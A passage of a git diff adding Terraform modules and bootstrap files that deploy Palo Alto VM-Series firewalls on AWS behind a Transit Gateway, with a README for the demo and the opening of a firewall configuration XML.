index 00000000..35971d7a
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/fw_in_asg/variables.tf
@@ -0,0 +1,52 @@
+variable tag {}
+variable region {}
+variable vpc_id {}
+variable vpc_sg_id {}
+variable fw_key_name {}
+variable fw_vm_type {}
+variable fw_sg_source {}
+variable fw_min_instances {}
+variable fw_max_instances {}
+variable fw_scale_threshold_up {}
+variable fw_scale_threshold_down {}
+variable fw_scale_parameter {}
+variable fw_scale_period {}
+variable fw_ami {}
+variable fw_bucket {}
+variable lambda_bucket {}
+
+variable api_key_firewall {}
+variable api_key_panorama {}
+variable api_key_delicense {}
+variable enable_debug {}
+
+variable fw_subnet0_id {
+  type = "list"
+}
+
+variable fw_subnet1_id {
+  type = "list"
+}
+
+variable fw_subnet2_id {
+  type = "list"
+}
+
+variable natgw_subnet_id {
+  type = "list"
+}
+
+variable lambda_subnet_id {
+  type = "list"
+}
+
+variable KeyMap {
+  default = {
+    "Key" = "panw-aws.zip"
+  }
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
diff --git a/aws/tgw_inbound_asg/modules/s3_bootstrap/main.tf b/aws/tgw_inbound_asg/modules/s3_bootstrap/main.tf
new file mode 100644
index 00000000..32fc086e
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/s3_bootstrap/main.tf
@@ -0,0 +1,100 @@
+resource "random_string" "randomstring" {
+  length      = 30
+  min_numeric = 30
+  special     = false
+}
+
+resource "aws_s3_bucket" "bootstrap" {
+  bucket        = "${var.bucket_name_random ? join("", list(var.bucket_name, "-", random_string.randomstring.result)) : var.bucket_name}"
+  acl           = "private"
+  force_destroy = true
+}
+
+resource "aws_s3_bucket_object" "config_full" {
+  count  = "${length(var.config) > 0 ? length(var.config) : "0" }"
+  key    = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "content_full" {
+  count  = "${length(var.content) > 0 ? length(var.content) : "0" }"
+  key    = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "software_full" {
+  count  = "${length(var.software) > 0 ? length(var.software) : "0" }"
+  key    = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "license_full" {
+  count  = "${length(var.license) > 0 ? length(var.license) : "0" }"
+  key    = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "other" {
+  count  = "${length(var.other) > 0 ? length(var.other) : "0" }"
+  key    = "${element(var.other, count.index)}"
+  source = "${var.file_location}${element(var.other, count.index)}"
+  bucket = "${aws_s3_bucket.bootstrap.id}"
+  acl    = "private"
+}
+
+resource "aws_s3_bucket_object" "config_empty" {
+  count   = "${length(var.config) == 0 ? 1 : 0 }"
+  key     = "config/"
+  content = "config/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "content_empty" {
+  count   = "${length(var.content) == 0 ? 1 : 0 }"
+  key     = "content/"
+  content = "content/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "license_empty" {
+  count   = "${length(var.license) == 0 ? 1 : 0 }"
+  key     = "license/"
+  content = "license/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+resource "aws_s3_bucket_object" "software_empty" {
+  count   = "${length(var.software) == 0 ? 1 : 0 }"
+  key     = "software/"
+  content = "software/"
+  bucket  = "${aws_s3_bucket.bootstrap.id}"
+  acl     = "private"
+}
+
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "aws_s3_bucket.bootstrap",
+    "aws_s3_bucket_object.config_full",
+    "aws_s3_bucket_object.content_full",
+    "aws_s3_bucket_object.license_full",
+    "aws_s3_bucket_object.software_full",
+    "aws_s3_bucket_object.other",
+    "aws_s3_bucket_object.config_empty",
+    "aws_s3_bucket_object.content_empty",
+    "aws_s3_bucket_object.license_empty",
+    "aws_s3_bucket_object.software_empty",
+  ]
+}
diff --git a/aws/tgw_inbound_asg/modules/s3_bootstrap/outputs.tf b/aws/tgw_inbound_asg/modules/s3_bootstrap/outputs.tf
new file mode 100644
index 00000000..d2ce4d7e
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/s3_bootstrap/outputs.tf
@@ -0,0 +1,7 @@
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${aws_s3_bucket.bootstrap.id}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg/modules/s3_bootstrap/variables.tf b/aws/tgw_inbound_asg/modules/s3_bootstrap/variables.tf
new file mode 100644
index 00000000..c49e5f82
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/s3_bootstrap/variables.tf
@@ -0,0 +1,26 @@
+variable bucket_name {}
+variable bucket_name_random {}
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable other {
+  default = []
+}
diff --git a/aws/tgw_inbound_asg/modules/vpc_in/main.tf b/aws/tgw_inbound_asg/modules/vpc_in/main.tf
new file mode 100644
index 00000000..6d698090
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/vpc_in/main.tf
@@ -0,0 +1,296 @@
+#-----------------------------------------------------------------------------------------------
+# Create IGW & VPC
+resource "aws_internet_gateway" "main" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  tags = {
+    Name = "${var.tag}-igw"
+  }
+}
+
+resource "aws_vpc" "main" {
+  cidr_block = "${var.cidr_vpc}"
+
+  tags = {
+    Name = "${var.tag}-vpc"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create mgmt subnets & mgmt route table
+resource "aws_eip" "natgw" {
+  count = "${length(var.cidr_natgw)}"
+  vpc   = true
+}
+
+
+resource "aws_nat_gateway" "natgw" {
+  count         = "${length(var.cidr_natgw)}"
+  allocation_id = "${element(aws_eip.natgw.*.id, count.index)}"
+  subnet_id     = "${element(aws_subnet.natgw.*.id, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-natgw"
+  }
+}
+
+resource "aws_route_table" "natgw" {
+  count  = "${length(var.cidr_natgw)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block = "0.0.0.0/0"
+    gateway_id = "${aws_internet_gateway.main.id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-natgw-rt"
+  }
+}
+
+resource "aws_subnet" "natgw" {
+  count             = "${length(var.cidr_natgw)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_natgw, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-natgw"
+  }
+}
+
+resource "aws_route_table_association" "natgw" {
+  count          = "${length(var.cidr_natgw)}"
+  subnet_id      = "${element(aws_subnet.natgw.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.natgw.*.id, count.index)}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create mgmt subnets & mgmt route table
+
+resource "aws_subnet" "mgmt" {
+  count             = "${length(var.cidr_mgmt)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_mgmt, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-mgmt"
+  }
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+  ]
+}
+
+resource "aws_route_table" "mgmt_natgw" {
+  count  = "${length(var.cidr_mgmt)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block     = "0.0.0.0/0"
+    nat_gateway_id = "${element(aws_nat_gateway.natgw.*.id, count.index)}"
+  }
+
+  tags = {
+    Name = "${var.tag}-mgmt-rt"
+  }
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+    "aws_internet_gateway.main",
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+  ]
+}
+
+resource "aws_route_table_association" "mgmt_natgw" {
+  count          = "${length(var.cidr_mgmt)}"
+  subnet_id      = "${element(aws_subnet.mgmt.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.mgmt_natgw.*.id, count.index)}"
+
+  depends_on = [
+    "aws_nat_gateway.natgw",
+    "aws_route_table.natgw",
+    "aws_subnet.natgw",
+    "aws_route_table_association.natgw",
+    "aws_internet_gateway.main",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create untrust subnets & untrust route table
+resource "aws_subnet" "untrust" {
+  count             = "${length(var.cidr_untrust)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_untrust, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-untrust"
+  }
+
+  depends_on = [
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_route_table" "untrust" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block = "0.0.0.0/0"
+    gateway_id = "${aws_internet_gateway.main.id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-untrust-rt"
+  }
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_vpc_endpoint" "s3" {
+  vpc_id          = "${aws_vpc.main.id}"
+  service_name    = "com.amazonaws.${var.region}.s3"
+  route_table_ids = ["${aws_route_table.untrust.id}"]
+}
+
+resource "aws_route_table_association" "untrust" {
+  count          = "${length(var.cidr_untrust)}"
+  subnet_id      = "${element(aws_subnet.untrust.*.id, count.index)}"
+  route_table_id = "${aws_route_table.untrust.id}"
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create trust subnets & trust route table
+resource "aws_subnet" "trust" {
+  count             = "${length(var.cidr_trust)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_trust, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-trust"
+  }
+
+  depends_on = [
+    "aws_route_table_association.mgmt_natgw",
+  ]
+}
+
+resource "aws_route_table" "trust" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block         = "0.0.0.0/0"
+    transit_gateway_id = "${var.tgw_id}"
+  }
+
+  tags = {
+    Name = "${var.tag}-trust-rt"
+  }
+
+  depends_on = [
+    "aws_ec2_transit_gateway_vpc_attachment.main",
+  ]
+}
+
+resource "aws_route_table_association" "trust" {
+  count          = "${length(var.cidr_trust)}"
+  subnet_id      = "${element(aws_subnet.trust.*.id, count.index)}"
+  route_table_id = "${aws_route_table.trust.id}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create tgw attachment subnets & tgw  route table
+resource "aws_subnet" "tgw" {
+  count             = "${length(var.cidr_tgw)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_tgw, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-tgw"
+  }
+}
+
+resource "aws_route_table" "tgw" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  tags = {
+    Name = "${var.tag}-tgw-rt"
+  }
+}
+
+resource "aws_route_table_association" "tgw" {
+  count          = "${length(var.cidr_tgw)}"
+  subnet_id      = "${element(aws_subnet.tgw.*.id, count.index)}"
+  route_table_id = "${aws_route_table.tgw.id}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create lambda subnets & route table
+resource "aws_subnet" "lambda" {
+  count             = "${length(var.cidr_lambda)}"
+  vpc_id            = "${aws_vpc.main.id}"
+  cidr_block        = "${element(var.cidr_lambda, count.index)}"
+  availability_zone = "${element(var.azs, count.index)}"
+
+  tags = {
+    Name = "${var.tag}-lambda"
+  }
+}
+
+resource "aws_route_table" "lambda" {
+  count  = "${length(var.cidr_lambda)}"
+  vpc_id = "${aws_vpc.main.id}"
+
+  route {
+    cidr_block     = "0.0.0.0/0"
+    nat_gateway_id = "${element(aws_nat_gateway.natgw.*.id, count.index)}"
+  }
+
+  tags = {
+    Name = "${var.tag}-lambda-rt"
+  }
+}
+
+resource "aws_route_table_association" "lambda" {
+  count          = "${length(var.cidr_lambda)}"
+  subnet_id      = "${element(aws_subnet.lambda.*.id, count.index)}"
+  route_table_id = "${element(aws_route_table.lambda.*.id, count.index)}"
+}
+
+#-----------------------------------------------------------------------------------------------
+# Associate with TGW
+resource "aws_ec2_transit_gateway_vpc_attachment" "main" {
+  vpc_id = "${aws_vpc.main.id}"
+
+  subnet_ids = ["${aws_subnet.tgw.*.id}"]
+
+  transit_gateway_id                              = "${var.tgw_id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags = {
+    Name = "${var.tag}-attachment"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "main" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
+  transit_gateway_route_table_id = "${var.tgw_rtb_id}"
+}
diff --git a/aws/tgw_inbound_asg/modules/vpc_in/outputs.tf b/aws/tgw_inbound_asg/modules/vpc_in/outputs.tf
new file mode 100644
index 00000000..d0b2229d
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/vpc_in/outputs.tf
@@ -0,0 +1,39 @@
+output "mgmt_id" {
+  value = "${aws_subnet.mgmt.*.id}"
+}
+
+output "untrust_id" {
+  value = "${aws_subnet.untrust.*.id}"
+}
+
+output "trust_id" {
+  value = "${aws_subnet.trust.*.id}"
+}
+
+output "tgw_id" {
+  value = "${aws_subnet.tgw.*.id}"
+}
+
+output "lambda_id" {
+  value = "${aws_subnet.lambda.*.id}"
+}
+
+output "natgw_id" {
+  value = "${aws_subnet.natgw.*.id}"
+}
+
+output "vpc_id" {
+  value = "${aws_vpc.main.id}"
+}
+
+output "tgw_vpc_attachment_id" {
+  value = "${aws_ec2_transit_gateway_vpc_attachment.main.id}"
+}
+
+output "default_security_group_id" {
+  value = "${aws_vpc.main.default_security_group_id}"
+}
+
+output "untrust_route_table_id" {
+  value = "${aws_route_table.untrust.id}"
+}
diff --git a/aws/tgw_inbound_asg/modules/vpc_in/variables.tf b/aws/tgw_inbound_asg/modules/vpc_in/variables.tf
new file mode 100644
index 00000000..d043a5b5
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/vpc_in/variables.tf
@@ -0,0 +1,36 @@
+variable tgw_id {}
+variable tgw_rtb_id {}
+variable region {}
+variable cidr_vpc {}
+
+variable azs {
+  type = "list"
+}
+
+variable cidr_mgmt {
+  type = "list"
+}
+
+variable cidr_untrust {
+  type = "list"
+}
+
+variable cidr_trust {
+  type = "list"
+}
+
+variable cidr_lambda {
+  type = "list"
+}
+
+variable cidr_tgw {
+  type = "list"
+}
+
+variable cidr_natgw {
+  type = "list"
+}
+
+variable tag {
+  default = "vmseries"
+}
diff --git a/aws/tgw_inbound_asg/outputs.tf b/aws/tgw_inbound_asg/outputs.tf
new file mode 100644
index 00000000..358ed0b0
--- /dev/null
+++ b/aws/tgw_inbound_asg/outputs.tf
@@ -0,0 +1,9 @@
+output "SQS-URL" {
+  value = "${module.fw_in.sqs_id}"
+}
+output "ELB-URL" {
+  value = "${module.fw_in.lb_dns_name}"
+}
+output "S3-BUCKET" {
+  value = "${module.s3_in.bucket_name}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg/variables.tf b/aws/tgw_inbound_asg/variables.tf
new file mode 100644
index 00000000..fba70b8e
--- /dev/null
+++ b/aws/tgw_inbound_asg/variables.tf
@@ -0,0 +1,37 @@
+provider "aws" {
+  version = ">= 1.0.0"
+  region  = "${var.region}"
+}
+
+variable tag {
+  default = "fw-in"
+}
+
+variable region {
+  default = "us-east-1"
+}
+
+variable key_name {
+  description = "Enter name of an existing EC2 key pair"
+ // default     = "my-key-pair"
+}
+
+variable fw_ami {
+  description = "FW AMI - https://docs.paloaltonetworks.com/compatibility-matrix/vm-series-firewalls/aws-cft-amazon-machine-images-ami-list/images-for-pan-os-8-1.html"
+  // default     = "ami-a2fa3bdf"
+}
+
+variable fw_sg_source {
+  description = "Source prefix to apply to mgmt ENI"
+ // default     = "0.0.0.0/0"
+}
+
+variable tgw_id {
+  description = "Enter the ID of an existing TGW"
+ // default     = "tgw-0123456789"
+}
+
+variable tgw_rtb_id {
+  description = "Enter the ID of an existing TGW route table to associate with VPC attachment"
+ // default     = "tgw-rtb-0123456789"
+}
\ No newline at end of file
diff --git a/aws/transitgateway-demo-v2/README.md b/aws/transitgateway-demo-v2/README.md
new file mode 100644
index 00000000..3050b07e
--- /dev/null
+++ b/aws/transitgateway-demo-v2/README.md
@@ -0,0 +1,40 @@
+## 2 x VM-Series / Transit Gateway / 2 x Spokes VPCs
+This build is a further iteration of [mattmclimans build](https://github.com/wwce/terraform/tree/master/aws/TGW-VPC)  that contains the following differences:
+1. Added HA Failover script that is found in the AWS CFT section.  
+2. Addtional subnets and NAT Gateways to support the lambda function
+
+## Overview
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/aws/tgw_2fw_vpc_insertion/images/diagram.png">
+</p>
+
+#### VM-Series Overview
+* Firewall-1 handles egress traffic to internet
+* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC
+* Both Firewalls can handle inbound traffic to the spokes
+* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment)
+
+#### S3 Buckets Overview
+* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration.
+* The buckets names have a random 30 string added to its name for global uniqueness `tgw-fw#-bootstrap-<randomString>`
+
+## Prerequistes 
+1. This Terraform build assumes the AWS CLI is installed on the machine doing the deploymnet [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html) .
+2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html).
+
+## How to Deploy
+1.  Download the **transitgateway-demo-v2** directory.
+2.  In an editor, open `variables.tf`
+    *  `Line 10`:  Set your existing AWS EC2 Key 
+    *  `Line 14`:  Enter a source address to access the VM-Series management interface (in valid CIDR notation).  This address will be added to the management interface's Network Security Group.
+    *  `Line 17`:  Uncomment either 'byol', 'payg1', or 'payg2'.  This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2).  
+3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in  `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`.  (Note: The authcode must be registered prior to deployment).
+4. After deployment, the firewalls' username and password are:
+     * **Username:** paloalto
+     * **Password:** PanPassword123!
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml
new file mode 100644
index 00000000..c9e19aeb
--- /dev/null
+++ b/aws/transitgateway-demo-v2/bootstrap_files/fw1/bootstrap.xml
@@ -0,0 +1,822 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$oxidaogq$toVFt6xD7ruJnTHYeVftq1</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <interface-management-profile>allow-lambda</interface-management-profile>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-lambda">
+              <https>yes</https>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway/>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
